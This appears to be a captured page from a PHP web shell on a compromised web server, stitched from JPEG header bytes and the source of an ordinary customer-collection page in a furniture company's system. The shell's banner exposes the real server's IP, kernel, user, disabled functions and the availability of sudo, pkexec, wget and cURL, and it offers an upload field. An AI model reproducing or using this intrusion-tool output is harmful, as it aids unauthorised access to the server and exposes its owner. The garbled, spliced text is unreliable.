����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 216.73.216.209 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/muebles/application/customer2OLD/ |
Upload File : |
<?php $titlepage="Clientes"; $idsmenu=4; include "../../library/config.php"; require_once("../model/dbconn.php"); require_once("../model/pos.php"); include "../layout/top-header.php"; include "../../library/check_login.php"; include "../../library/check_access.php"; $posR = new pos(); $resultR = array(); $queryR = $posR->getMaxC(); $dataR = $queryR[1]; //aumentamos en 1 para el proximo id $resultR['Max_id'] = $dataR['id'] + 1; ?> <link rel="stylesheet" href="../../dist/css/bootstrap-switch.min.css"> <link rel="stylesheet" href="../../plugins/datepicker/datepicker3.css"> <!-- Main content --> <section class="content"> <!-- Default box --> <div class="box box-primary"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Datos de Cobranza de Cliente <small>visita <a href="http://yusasoft.com/">Sistemas Yusa</a> Mas Informacion</small> </h1> </section> <div class="box-body"> <!-- main navigation bar disini --> <div class="collapse navbar-collapse pull-left" id="navbar-collapse"> <ul class="nav navbar-nav"> <li style="Background-color:orange"> <a href="menu.php" title="salir inventarios" >Regresar</a> </li> </ul> </div> <div class="row"> <div class=" col-xs-12" style="padding-left:25px;padding-right:25px"> <input type="text" class="form-control " id="txtclient" value="" placeholder="Buscar cliente Por nombre o numero de contrato..."> </div> </div> <div class="table-responsive margin"> <table id="tableemployed" class="table table-bordered"> <thead> <tr> <th style="width: 10px">#</th> <th style="width: 10px">Cliente</th> <th style="width: 150px">Periodo de Pago</th> <th style="width: 150px;">Dias de Pago</th> <th style="width: 25px;">Fecha de Alta</th> </tr> </thead> <tbody></tbody> </table> </div> </div> <!-- /.box-body --> </div> <!-- /.box --> </section> <!-- /.content --> <?php include "../layout/footer.php"; //footer template ?> <?php include "../layout/bottom-footer.php"; //footer template ?> <script src="../../plugins/datepicker/bootstrap-datepicker.js"></script> <script src="../../dist/js/redirect.js"></script> <script type="text/javascript"> $(document).ready( function () { $( "#txtclient" ).autocomplete({ search : function(){$(this).addClass('working');}, open : function(){$(this).removeClass('working');}, source: function(request, response) { $.getJSON("autocomplete_job.php", { term: $('#txtclient').val() }, response); }, minLength:1, select:function(event, ui){ $("#txtclientA").val(ui.item.id_client); $("#modal-customer_job").modal("show"); } }).autocomplete( "instance" )._renderItem = function( ul, item ) { return $( "<li>" ) .append( "<dl><dt>"+item.id + "</dt>"+item.name+ "</dl>" ) .appendTo( ul ); }; //iniciar datos de trabajo de cliente init_data(); }); function init_data(){ var value = { method : "getdataColecction" }; $('#tableemployed').DataTable({ "paging": false, "lengthChange": false, "searching": false, "ordering": false, "info": false, "responsive": true, "autoWidth": true, "pageLength": 50, "dom": '<"top"f>rtip', "columnDefs": [ { className: "textright", "targets": [ 1,2,3 ] } ], "ajax": { "url": "customer.php", "type": "POST", "data":value, }, "columns": [ { "data": "id_cust" }, { "data": "cliente" }, { "data": "periodo" }, { "data": "dias" }, { "data": "created_at" }, ] }); set_focus("#txtclient"); } </script> </body> </html>